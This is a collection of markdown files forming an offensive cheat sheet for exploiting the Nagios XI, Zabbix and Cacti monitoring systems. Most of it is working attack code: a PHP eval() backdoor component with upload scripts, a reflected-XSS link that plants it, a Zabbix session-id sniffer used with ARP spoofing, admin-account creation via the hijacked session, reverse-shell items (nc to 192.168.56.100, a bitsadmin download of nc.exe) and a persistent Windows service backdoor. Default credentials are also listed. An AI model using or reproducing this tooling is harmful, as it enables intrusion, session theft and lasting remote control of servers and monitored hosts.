├── php_shell_via_component_upload_NagiosXI.md
├── README.md
├── Zabbix_session_hijacking.md
├── xss_or_js_shell_uploading_NagiosXI.md
└── Zabbix_spawn_shell_on_agents.md
/php_shell_via_component_upload_NagiosXI.md:
--------------------------------------------------------------------------------
## After the Nagios XI administration panel has been accessed, we can upload a malicious component that gives us a web shell on the server, even without any other access to the host. ##
# Component code example #
```php
<?php
// Standard Nagios XI component layout: components/<name>/<name>.inc.php,
// which pulls in the component helper and registers itself when loaded.
require_once(dirname(__FILE__) . '/../componenthelper.inc.php');

$shellaction_component_name = "shellaction";
shellaction_component_init();

function shellaction_component_init()
{
    global $shellaction_component_name;
    $desc = "";

    $args = array(
        COMPONENT_NAME => $shellaction_component_name,
        COMPONENT_AUTHOR => "test",
        COMPONENT_DESCRIPTION => _("test. ") . $desc,
        COMPONENT_TITLE => "shell",
        COMPONENT_DATE => '08/08/2017',
        COMPONENT_VERSION => '1.3.3.7'
    );

    register_component($shellaction_component_name, $args);

    // The backdoor: this file is included whenever Nagios XI loads its components,
    // so any request carrying ?_cmd=<php code> reaches the eval() below.
    if (isset($_GET['_cmd']))
        eval($_GET['_cmd']);
}
```
## Component creation and uploading ##
1) Save the file as `<name>.inc.php`, where `<name>` is the value of *$shellaction_component_name* (example: shellaction.inc.php).

2) Put the file in a directory with the same name (example: shellaction/).

3) Zip the whole directory (example for *nix: zip -r shell.zip shellaction).

4) Go to Admin -> Manage Components and upload the archive (shell.zip).


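The four steps above, as an added example that is not part of the original cheat sheet: it builds the archive in the layout Nagios XI expects, checks that layout before uploading, and encodes the same multipart form the Manage Components page submits (fields `uploadedfile`, `upload`, `nsp`). The base URL, the admin session cookie and the `nsp` token are assumed to be supplied by the caller from an authenticated session; the PHP source embedded here is a constructed stand-in with the component skeleton and no backdoor.

```python
"""Package a Nagios XI component and prepare the Manage Components upload.

Added example, not part of the original cheat sheet. Assumed: the target's base URL,
an authenticated admin session cookie and its nsp token are supplied by the caller.
"""
import io
import urllib.request
import uuid
import zipfile

COMPONENT_NAME = "shellaction"

# Constructed stand-in for the component source: same skeleton, no backdoor.
COMPONENT_PHP = b"""<?php
require_once(dirname(__FILE__) . '/../componenthelper.inc.php');
$shellaction_component_name = "shellaction";
shellaction_component_init();
function shellaction_component_init() {
    global $shellaction_component_name;
    register_component($shellaction_component_name, array(COMPONENT_NAME => $shellaction_component_name));
}
"""


def build_component_zip(name: str, php_source: bytes) -> bytes:
    """Return an archive holding <name>/<name>.inc.php, the layout `zip -r` of the
    component directory produces and the one Nagios XI installs from."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}/{name}.inc.php", php_source)
    return buf.getvalue()


def check_layout(zip_bytes: bytes, name: str) -> bool:
    """Sanity check before uploading: exactly one file, at the path Nagios XI expects."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        files = [n for n in zf.namelist() if not n.endswith("/")]
    return files == [f"{name}/{name}.inc.php"]


def multipart_body(fields: dict, file_field: str, filename: str, data: bytes):
    """Encode the form the way the browser does on the Manage Components page:
    the text fields (upload=1, nsp=<token>) plus the archive as 'uploadedfile'."""
    boundary = "----" + uuid.uuid4().hex
    parts = []
    for key, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{key}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        (
            f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
            f'filename="{filename}"\r\nContent-Type: application/zip\r\n\r\n'
        ).encode()
        + data
        + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def upload_component(base_url: str, cookie: str, nsp: str, zip_bytes: bytes) -> int:
    """POST the archive to admin/components.php. `cookie` is the admin's Cookie header
    value; `nsp` is the per-session token the frontend exposes as window.nsp_str.
    This is the only function that touches the network."""
    body, content_type = multipart_body(
        {"upload": "1", "nsp": nsp}, "uploadedfile", "shell.zip", zip_bytes
    )
    req = urllib.request.Request(
        base_url.rstrip("/") + "/nagiosxi/admin/components.php", data=body, method="POST"
    )
    req.add_header("Content-Type", content_type)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    archive = build_component_zip(COMPONENT_NAME, COMPONENT_PHP)
    assert check_layout(archive, COMPONENT_NAME)
    with open("shell.zip", "wb") as fh:
        fh.write(archive)
    print("wrote shell.zip; send it with upload_component(url, cookie, nsp, archive)")
```

Run it as a script to get `shell.zip` on disk for the manual upload, or call `upload_component()` with the session cookie and `nsp` value copied from the browser to skip the form. `check_layout()` catches the usual mistake of zipping the file instead of the directory, which Nagios XI rejects silently.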
## Command execution ##

After that we can execute system commands directly from the browser's address bar (example: host/nagiosxi/admin?xiwindow=dashlets.php&_cmd=system('cat /etc/passwd');). The value of _cmd goes straight into eval(), so it must be valid PHP; URL-encode the quotes and spaces if your browser does not do it for you.


## We are done here! ##

Tested on NagiosXI 5.4.8

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Monitoring-Systems-Cheat-Sheet #
Cheat sheet for pentesters and researchers on exploiting monitoring systems.

## Exploring ##
Check the version of the system. Try to log in with default credentials.

### Version Check ###

[Zabbix/Nagios version checker](https://github.com/HD421/Monitoring-Systems-Version-Check)

[Cacti version checker](https://github.com/worlak2/cactiVersionCheck)

### Default Credentials ###

| | SSH Credentials | Database Credentials | Web Credentials | Port |
|-------|:-------------------:|-------------------------------------|-----------------------|-----|
| Zabbix <= 2.4 | root/zabbix, zabbix/zabbix | root/zabbix, zabbix/zabbix | Admin/zabbix, admin/admin | 10050 (agent), 10051 (server) |
| Zabbix >= 3.0 | appliance/zabbix | zabbix/zabbix | Admin/zabbix, Admin/Admin | 10050 (agent), 10051 (server) |
| Nagios | root/nagiosxi | -- | nagiosadmin/nagios, nagiosadmin/nagiosadmin | 5666 (NRPE) |
| Cacti | -- | cactiuser/cactiuser | admin/admin | 80, 443, 8080 |

## Exploits ##
Known vulnerabilities.

| NagiosXI | Version |
|-------|---------|
|[NRPE RCE](https://www.exploit-db.com/exploits/24955/)| <= 5.2.8 |
|[Chained RCE](https://www.exploit-db.com/exploits/40067/)| <= 5.2.7 |
|[Chained Remote Root](https://www.exploit-db.com/exploits/44560/)| <= 5.4.12 |

| Zabbix | Version |
|-------|---------|
|[Command Execution](http://www.cvedetails.com/cve/cve-2009-4498)| <= 1.7.4 |

| Cacti | Version |
|-------|---------|
|[SQL Injection](https://vulners.com/cve/CVE-2016-3172)| <= 0.8.8g |
|[SQL Injection](https://vulners.com/cve/CVE-2015-8604)| 0.8.8f |
|[SQL Injection](https://vulners.com/zdt/1337DAY-ID-24696)| 0.8.8f |
|[SQL Injection](https://vulners.com/cve/CVE-2015-4634)| 0.8.8d |
|[SQL Injection](https://vulners.com/cve/CVE-2015-4454)| 0.8.8c |
|[Reflected XSS](https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-007/?fid=7789)| 0.8.8b |
|[SQL Injection](https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-007/?fid=7789)| 0.8.8b |
|[Reflected XSS](https://github.com/Cacti/cacti/issues/838)| 1.1.12 |
|[Reflected XSS](https://github.com/Cacti/cacti/issues/867)| 1.1.13 |
|[Path Traversal](https://github.com/Cacti/cacti/issues/877)| 1.1.15 |
|[RCE](https://github.com/Cacti/cacti/issues/877)| 1.1.15 |
|[Reflected XSS](https://github.com/Cacti/cacti/issues/877)| 1.1.15 |
|[Reflected XSS](https://github.com/Cacti/cacti/issues/907)| 1.1.17 |
|[Stored XSS](https://github.com/Cacti/cacti/issues/918)| 1.1.17 |
|[Reflected XSS](https://github.com/Cacti/cacti/issues/1010)| 1.1.23 |
|[RCE](https://github.com/Cacti/cacti/issues/1057)| 1.1.27 |
|[AFR+RCE](https://github.com/Cacti/cacti/issues/1066)| 1.1.27 |


## Postexploitation ##
You are successfully logged in, what's next?

### NagiosXI ###
[Spawning a PHP shell via component upload](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/php_shell_via_component_upload_NagiosXI.md)

[XSS -> RCE vector. Spawning a shell via JS execution (worked on NagiosXI <= 5.4.12)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/xss_or_js_shell_uploading_NagiosXI.md)

[XSS -> RCE by polict (NagiosXI 5.5.10)](https://www.shielder.it/blog/nagios-xi-5-5-10-xss-to-root-rce/)

[RCE on monitored hosts through the NRPE (<= 2.14) plugin](https://vulners.com/metasploit/MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS)

[NagiosXI Vulnerability Chaining. Death By a Thousand Cuts (<= 5.4.12)](https://blog.redactedsec.net/exploits/2018/04/26/nagios.html)

### Zabbix ###
[Stealing the administrator's session and creating our own privileged account (ARP spoofing)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_session_hijacking.md)

[Spawning a shell on monitored agents (Unix/Windows)](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_spawn_shell_on_agents.md)

### PRTG ###

[PRTG NETWORK MONITOR PRIVILEGE ESCALATION (version 18.2.41.1652)](https://www.criticalstart.com/2018/10/prtg-network-monitor-privilege-escalation/) || [Exploit](https://github.com/Critical-Start/Section-8/blob/master/Paessler%20-%20PRTG/prtg_privesc.ps1)

--------------------------------------------------------------------------------
/Zabbix_session_hijacking.md:
--------------------------------------------------------------------------------
## A bit of theory
The Zabbix server port is 10051 by default and the agent's is 10050.

Traffic between the agent and the server is transmitted in plaintext (unless you configure encryption in the agent and server configuration), in TCP packets with the PSH flag set.

The Zabbix API is web-based, delivered as part of the web interface, and uses the JSON-RPC 2.0 protocol.
Most of Zabbix's features can be driven by sending HTTP POST requests to api_jsonrpc.php, which lives in the web interface directory.

This means that when a user authenticates (for example, when the administrator logs into the Zabbix web interface), a JSON request/response exchange takes place.
For each user a zbx_sessionid is generated and then carried by every later request to the Zabbix frontend and API.

The zbx_sessionid is issued when the user logs in through the web interface with login and password.
Its value is "salted" with a timestamp, which makes forging one impractical.
However, it is sent in plaintext: as the zbx_sessionid cookie of the web session and as the auth field of API POST requests. Anyone who can see the HTTP traffic (no TLS) can read it.

Is it possible to reuse an intercepted zbx_sessionid? Yes, for as long as the user's session is still valid.

## Hijacking
We will use the simplest method: ARP spoofing and a custom script that looks for the session id in the traffic passing through our machine.

Enable packet forwarding:
```bash
sysctl -w net.ipv4.ip_forward=1
```
Start ARP spoofing with whatever tool you prefer (arpspoof, ettercap, bettercap):



Start the zbx_sessionid catching script (Linux only; the raw socket needs root):

```python
import re
import socket

# Raw socket on all interfaces, IPv4 frames only (ETH_P_IP = 0x0800).
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
print("trying to catch zbx_sessionid")
while True:
    try:
        data = s.recvfrom(65565)
        # 14-byte Ethernet + 20-byte IPv4 + 20-byte TCP header = 54 bytes;
        # this assumes neither IP nor TCP options are present.
        raw = data[0][54:]
        if b"HTTP" not in raw or b"\r\n\r\n" not in raw:
            continue
        header = raw.split(b"\r\n\r\n")[0].decode("latin-1")
        print("[*] Header Captured")
        # The cookie is sent on every frontend request once the user is logged in.
        m = re.search(r"zbx_sessionid=(\w+)", header)
        if m:
            session_id = m.group(1)
            print("session_id is :")
            print(session_id)
            # Save the zbx_sessionid to a file
            with open("zbx_sessionids.txt", "a") as saved:
                saved.write(session_id + "\n")
            print("zabbix session id saved in file zbx_sessionids.txt")
    except KeyboardInterrupt:
        s.close()
        break
```
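The catching script above keys on a fixed 54-byte offset and only looks at the request headers. The following added example (not part of the original cheat sheet) does the same job more carefully: it strips the Ethernet/IPv4/TCP headers by reading the IHL and data-offset fields, so frames with IP or TCP options are parsed correctly, and it pulls the session id out of both places it appears in plaintext, the `zbx_sessionid` cookie and the `auth`/`result` fields of JSON-RPC bodies. The HTTP messages and the frames wrapped around them are constructed here; on a real capture, pass each frame from the raw socket to `tcp_payload()` and its result to `extract_session_ids()`.

```python
"""Find Zabbix session ids in captured HTTP traffic.

Added example, not part of the original cheat sheet. The sample messages and frames
below are constructed; on a live capture feed raw-socket frames to tcp_payload().
"""
import json
import re
import struct

COOKIE_RE = re.compile(r"zbx_sessionid=([0-9A-Za-z]+)")
TOKEN_RE = re.compile(r"[0-9A-Za-z]{16,}")


def tcp_payload(frame: bytes):
    """Strip Ethernet/IPv4/TCP headers using the IHL and data-offset fields, so frames
    carrying IP or TCP options (where a fixed 54-byte offset is wrong) are handled.
    Returns None for anything that is not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType is not IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:                                    # IP protocol is not TCP
        return None
    tcp_start = 14 + ihl
    if len(frame) < tcp_start + 20:
        return None
    data_offset = (frame[tcp_start + 12] >> 4) * 4
    return frame[tcp_start + data_offset:]


def extract_session_ids(http_message: bytes) -> set:
    """Return every session id in one HTTP message: the zbx_sessionid cookie the browser
    sends (or Set-Cookie returns), plus the 'auth' field of an API call and the 'result'
    of a user.login reply, which carry the same token in the JSON-RPC body."""
    text = http_message.decode("latin-1")
    found = set(COOKIE_RE.findall(text))
    head, sep, body = text.partition("\r\n\r\n")
    if sep:
        try:
            obj = json.loads(body)
        except ValueError:
            return found
        if isinstance(obj, dict):
            for key in ("auth", "result"):
                value = obj.get(key)
                if isinstance(value, str) and TOKEN_RE.fullmatch(value):
                    found.add(value)
    return found


def make_frame(payload: bytes, ip_options: bytes = b"", tcp_options: bytes = b"") -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame around `payload` (constructed test data;
    checksums stay zero, which is enough for header parsing)."""
    assert len(ip_options) % 4 == 0 and len(tcp_options) % 4 == 0
    ihl = 5 + len(ip_options) // 4
    doff = 5 + len(tcp_options) // 4
    tcp = struct.pack("!HHIIBBHHH", 12345, 80, 0, 0, doff << 4, 0x18, 65535, 0, 0) + tcp_options
    total = ihl * 4 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, total, 0, 0x4000, 64, 6, 0,
                     b"\xc0\xa8\x38\x01", b"\xc0\xa8\x38\x66") + ip_options
    eth = b"\x00" * 12 + b"\x08\x00"
    return eth + ip + tcp + payload


# Constructed samples: a frontend request carrying the cookie, and an API call
# carrying the same id in its "auth" field.
SAMPLE_WEB = (
    b"GET /zabbix/zabbix.php?action=dashboard.view HTTP/1.1\r\n"
    b"Host: zabbix.example\r\n"
    b"Cookie: zbx_sessionid=0424bd59b807674191e7d77572075f33\r\n\r\n"
)
SAMPLE_API = (
    b"POST /zabbix/api_jsonrpc.php HTTP/1.1\r\nContent-Type: application/json\r\n\r\n"
    b'{"jsonrpc":"2.0","method":"host.get","params":{},"auth":"0424bd59b807674191e7d77572075f33","id":1}'
)
```

Two things worth keeping in mind when running this on live traffic: a TCP segment can split an HTTP message, so reassemble per connection before calling `extract_session_ids()` if you see truncated headers, and an `auth` value seen in an API call from a script is just as usable as the browser cookie, since both are the same session token.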


## Postexploitation time

It's time to create an account with administrator privileges.
The following script does it with the hijacked session id and then verifies the new credentials:

```python
import json
import requests
from pyzabbix import ZabbixAPI

# api_address = "http://192.168.56.102/zabbix/api_jsonrpc.php"
api_address = input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php: \n")
zbx_sessionid = input("enter zbx_sessionid: \n")
user = input("enter username: \n")
password = input("enter password: \n")

headers = {"Content-Type": "application/json"}
# user.create on behalf of the hijacked session: the stolen id goes into "auth".
# type 3 = Super Admin; usrgrpid 7 = the "Zabbix administrators" group of a default
# install. (Zabbix 5.2 replaced "type" with "roleid" and 5.4 renamed "alias" to "username".)
data = {
    "jsonrpc": "2.0",
    "method": "user.create",
    "params": {
        "alias": user,
        "passwd": password,
        "type": "3",
        "usrgrps": [{"usrgrpid": "7"}],
    },
    "auth": zbx_sessionid,
    "id": 1,
}
answer = requests.post(api_address, data=json.dumps(data), headers=headers)
print(answer)
response = answer.json()
print(response)

# Log in with the freshly created credentials through pyzabbix to confirm they work.
print("testing user parameters:")
zapi = ZabbixAPI(api_address)
zapi.login(user, password)
print("Connected to Zabbix API Version %s" % zapi.api_version())
```



Check the web interface:



--------------------------------------------------------------------------------
/xss_or_js_shell_uploading_NagiosXI.md:
--------------------------------------------------------------------------------
# PHP shell spawn in a single request #
## This works on NagiosXI 5.4.12 and possibly on earlier versions ##

You can skip the [building an evil component](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/php_shell_via_component_upload_NagiosXI.md) step and run the function below to upload the PHP shell.

## Creating a JavaScript function for component uploading ##
```javascript
(function() {
    // our evil component shell.zip, base64-encoded (atob ignores the whitespace)
    var raw = window.atob('UEsDBAoAAAAAACF2CksAAAAAAAAAAAAAAAAMABwAc2hlbGxhY3Rpb24vVVQJAANdcoxZcXKMWXV4CwABBOgDAAAEZAAAAFBLAw QUAAAACADpdQpLAQDoCrkBAAASBAAAHwAcAHNoZWxsYWN0aW9uL3NoZWxsYWN0aW9uLmluYy5waHBVVAkAA/VxjFkfcoxZdXgLAAEE6AMAAAR kAAAArVNda9swFH2efsXFBGxD64/0g5CsG8ZzW0PqhMTdQ8sQmq06Akf2JLdQxv57JSVpsmLy1IsR+N57zrn3WP76vV21yPfVA3PGK4iKjjUc4mbdNpzyT hfipn0VrFp14BQuDIMwOFXHBWSkYo2EhHdUtIJJKk9gOo09iOoaDECCoJKKF1p6mgj0MUjLMcgVrWtitDzGC09NAeFouCEPw9NwpF7HZ8H4/PIBaEVq2Z ESBggJ+ueZCYobXlCnZIKTNXUwvk6nCcYueGD7nucXu/GVTEvFTsJ2JwgNDrTxeyPWRHAF1kHVmqD+XsZZ52gu/5PCuDy7m8+yJMshzdIcru+zOE9n2fLzR NDTM9983mNrob8IVFR185vUcMQttb9uHJRUFto5Zdc2Q0QlVYYIQV4dk9LxviDOorsErr7BPo7InPQQRPf57WxxSGF1VHZWX++PZBkv0rn2cgvAjun2wNI XxszfB8zTfPr/mJvL0a8S5R9WsoNzfzjy1Y2+tPsQP5PFcj+TQYReYJtOd+utoBWT6u/aW+Icc2rj/A7MnsBhUlKFwTdJ/mjjYl3av1zXVL/QF1J/qEzQP/QGUEsB Ah4DCgAAAAAAIXYKSwAAAAAAAAAAAAAAAAwAGAAAAAAAAAAQAO1BAAAAAHNoZWxsYWN0aW9uL1VUBQADXXKMWXV4CwABBOgDAAAEZAAA AFBLAQIeAxQAAAAIAOl1CksBAOgKuQEAABIEAAAfABgAAAAAAAEAAADtgUYAAABzaGVsbGFjdGlvbi9zaGVsbGFjdGlvbi5pbmMucGhwVVQFAAP1cYxZ dXgLAAEE6AMAAARkAAAAUEsFBgAAAAACAAIAtwAAAFgCAAAAAA==');
    // turn the decoded string into raw bytes for the Blob
    var rl = raw.length;
    var u8a = new Uint8Array(rl);
    for (var i = 0; i < rl; ++i)
        u8a[i] = raw.charCodeAt(i);
    // same form the Manage Components page submits; nsp is the per-session token
    var fd = new FormData();
    fd.append('uploadedfile', new Blob([u8a], {type: 'application/zip'}));
    fd.append('upload', 1);
    fd.append('nsp', parent.window.nsp_str);
    var request = new XMLHttpRequest();
    request.open("POST", "/nagiosxi/admin/components.php");
    request.send(fd);
})();
```

## Optimizing payload ##
Now we base64-encode the JS function itself one more time, so the whole shell upload happens in a single request: the encoded script goes into the xiwindow parameter, which is vulnerable to reflected XSS, as javascript:eval(atob('...')).
If you already have access to the administrative panel, you can also run the JS function from the previous step directly in your browser console.

```
*Your_HOST*/nagiosxi/config/?xiwindow=%20javascript:eval(atob(%27<base64 of the JS function above>%27))//
```
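How the final URL is assembled, as an added example that is not part of the original cheat sheet: `uploader_js()` drops the archive, base64-encoded, into the uploader from the previous step; `xss_url()` base64-encodes that script a second time, wraps it in `javascript:eval(atob('...'))//` and percent-encodes it into `xiwindow`; `decode_xss_url()` undoes both layers so the payload can be checked before it is sent. The archive bytes here are a constructed placeholder, not a real component, and the host name is made up.

```python
"""Wrap the uploader in the single-request reflected-XSS URL for the xiwindow parameter.

Added example, not part of the original cheat sheet. SAMPLE_ZIP is a constructed
placeholder, not a real archive; feed in the real shell.zip instead.
"""
import base64
import urllib.parse

# Constructed placeholder standing in for shell.zip.
SAMPLE_ZIP = b"PK\x03\x04 placeholder bytes, not a real archive"

# The uploader from the previous step, with a slot for the base64 archive.
UPLOADER_JS = """(function() {
  var raw = window.atob('%s');
  var u8a = new Uint8Array(raw.length);
  for (var i = 0; i < raw.length; ++i) u8a[i] = raw.charCodeAt(i);
  var fd = new FormData();
  fd.append('uploadedfile', new Blob([u8a], {type: 'application/zip'}));
  fd.append('upload', 1);
  fd.append('nsp', parent.window.nsp_str);
  var r = new XMLHttpRequest();
  r.open('POST', '/nagiosxi/admin/components.php');
  r.send(fd);
})();"""


def uploader_js(zip_bytes: bytes) -> str:
    """Embed the archive, base64-encoded, into the JavaScript uploader."""
    return UPLOADER_JS % base64.b64encode(zip_bytes).decode()


def xss_url(host: str, js: str) -> str:
    """Base64 the script a second time and place it in xiwindow as
    javascript:eval(atob('...')). The trailing // comments out whatever the page
    appends after the injection point; percent-encoding keeps +, / and = intact."""
    b64 = base64.b64encode(js.encode()).decode()
    payload = f"javascript:eval(atob('{b64}'))//"
    return f"{host}/nagiosxi/config/?xiwindow=%20" + urllib.parse.quote(payload, safe="")


def decode_xss_url(url: str) -> str:
    """Reverse both encodings, for checking the payload before it is sent."""
    query = urllib.parse.urlsplit(url).query
    xiwindow = urllib.parse.parse_qs(query)["xiwindow"][0].strip()
    inner = xiwindow[len("javascript:eval(atob('"):-len("'))//")]
    return base64.b64decode(inner).decode()


if __name__ == "__main__":
    script = uploader_js(SAMPLE_ZIP)
    url = xss_url("http://nagios.example", script)
    assert decode_xss_url(url) == script
    print(url)
```

The second base64 layer is what makes the link safe to paste: the inner script contains quotes, angle-free but space-laden JavaScript, and the archive's own base64 with `+`, `/` and `=`; after `atob` wrapping, the only characters left to percent-encode are the few in `javascript:eval(atob(''))//`.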

After execution you can access your shell like this (example: *your_host*/nagiosxi/admin?xiwindow=dashlets.php&_cmd=system('cat /etc/passwd');)




Hint: how to change the admin password through the same shell:
_cmd=system('/usr/local/nagiosxi/scripts/reset_nagiosadmin_password.php --password=qwerty');


Tested on NagiosXI 5.4.12

--------------------------------------------------------------------------------
/Zabbix_spawn_shell_on_agents.md:
--------------------------------------------------------------------------------
# Somehow you've got access to the Zabbix admin account or created your own (taking advantage of this [guide](https://github.com/HD421/Monitoring-Systems-Cheat-Sheet/blob/master/Zabbix_session_hijacking.md)). Time for some RCE on the monitored hosts!

Zabbix can run remote commands on its agents. This works when the agent configuration file is in the following state:
1. The Server parameter allows the Zabbix server's address (and ServerActive points at it, if active checks are used).
2. The Hostname parameter matches the host name configured for that host in the Zabbix server's web interface.
3. EnableRemoteCommands = 1, which lets the agent run the commands the server sends. (Since Zabbix 5.0 this option is deprecated and system.run has to be permitted with AllowKey=system.run[*] instead.)
4. Timeout = 30, which specifies how long the agent waits for a command to finish. It must be between 1 and 30, so a command run this way is killed after at most 30 seconds and gives no persistent shell by itself.

It is also important to remember that the item key, and with it the command, is limited to 255 characters.
As a result, the successful scenario is to add an item in Zabbix that creates a shell, which will be reachable for 30 seconds at best, and during its lifetime plant an independent persistent shell.

You can use this script to get information about the monitored agents.
```python
from pyzabbix import ZabbixAPI

api_address = input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php: \n")
user = input("enter username: \n")
password = input("enter password: \n")

zapi = ZabbixAPI(api_address)
zapi.login(user, password)
print("Connected to Zabbix API Version %s" % zapi.api_version())

# List every monitored host with its id; the id is what item.create needs later.
for h in zapi.host.get(output="extend"):
    print("found host:", h["host"], "hostid:", h["hostid"])
```
Result:


## Shell on Linux agent

Script to spawn the netcat shell. It creates a passive agent item whose key runs nc; the server polls it every `delay` seconds, so the command is re-run until you delete the item:

```python
import sys
from pyzabbix import ZabbixAPI, ZabbixAPIException

api_address = input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php: \n")
user = input("enter username: \n")
password = input("enter password: \n")
host_name = input("enter hostname: \n")

zapi = ZabbixAPI(api_address)
# Login to the Zabbix API
zapi.login(user, password)

# Look the host up by name and take its first interface; item.create needs both ids.
hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
if not hosts:
    print("No hosts found")
    sys.exit(1)

host_id = hosts[0]["hostid"]
print("Found host id {0}".format(host_id))
try:
    # type=0: Zabbix agent (passive) item, value_type=4: text, delay in seconds.
    # The agent executes the system.run command each time the server polls the item.
    item = zapi.item.create(
        hostid=host_id,
        name="netcat_create_reverse_shell",
        key_='system.run["nc 192.168.56.100 4444 -e /bin/bash"]',
        type=0,
        value_type=4,
        interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
        delay=5,
    )
except ZabbixAPIException as e:
    print(e)
    sys.exit(1)
print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
```

How it looks:


Connect to our shell:


Now you have to gain a foothold on the system and leave a persistent shell behind.

## Shell on Windows agent

By default, on Windows the agent is installed and started as a service with SYSTEM privileges.
```python
import sys
from pyzabbix import ZabbixAPI, ZabbixAPIException

api_address = input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php: \n")
user = input("enter username: \n")
password = input("enter password: \n")
host_name = input("enter hostname: \n")   # e.g. "windows host" as named in the frontend

zapi = ZabbixAPI(api_address)
# Login to the Zabbix API
zapi.login(user, password)

hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
if not hosts:
    print("No hosts found")
    sys.exit(1)

host_id = hosts[0]["hostid"]
print("Found host id {0}".format(host_id))
try:
    # bitsadmin fetches nc.exe from our web server (the /transfer job needs a name),
    # then nc connects back with cmd.exe. Same item parameters as the Linux script.
    item = zapi.item.create(
        hostid=host_id,
        name="netcat_create_reverse_shell",
        key_='system.run["bitsadmin.exe /transfer nc /download /priority normal '
             'http://192.168.56.100/nc.exe C:\\Temp\\nc.exe && '
             'C:\\Temp\\nc.exe 192.168.56.100 5555 -e cmd.exe"]',
        type=0,
        value_type=4,
        interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
        delay=30,
    )
except ZabbixAPIException as e:
    print(e)
    sys.exit(1)
print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
```

And then...


Here the 30 s timeout gets in the way too, so we set up a permanent shell.

The agent runs as a service under SYSTEM, so its configuration file can be modified; registering one item on the server is enough. For example, create an item whose remote command appends the lines we need to the end of the agent's configuration file.
What about the shell itself? Since the rights allow it, create a Windows service that brings up the nc tunnel. Write the service-creation command to a file and feed that file to the nc shell's stdin (file service.txt):

```bash
sc create reversencbackdoor binpath= "cmd /C C:\Users\Public\nc.exe 192.168.56.100 6666 -e cmd.exe" type= own start= auto DisplayName= "NC service backdoor"
```

The service is managed the same way, only the commands change (file service_run.txt):
```bash
sc query reversencbackdoor
sc stop reversencbackdoor
sc start reversencbackdoor
```
As a result:


To connect, start a listener on port 6666 first and then start the service; without a listener the service starts and exits immediately.



At this moment, in a separate window:



Once the Zabbix-spawned shell is gone, the service keeps giving us a permanent shell that connects back to port 6666:



P.S.
Thanks to [Shodin](https://github.com/freeworkaz) for his contribution to this cheat sheet. The latest versions of these scripts can be found [here](https://github.com/freeworkaz/zabbix_test). You can also watch the explanation [videos](https://www.youtube.com/channel/UC4wr-m-_6kRz2cHkdtRbW2g/videos) for a deeper understanding.

--------------------------------------------------------------------------------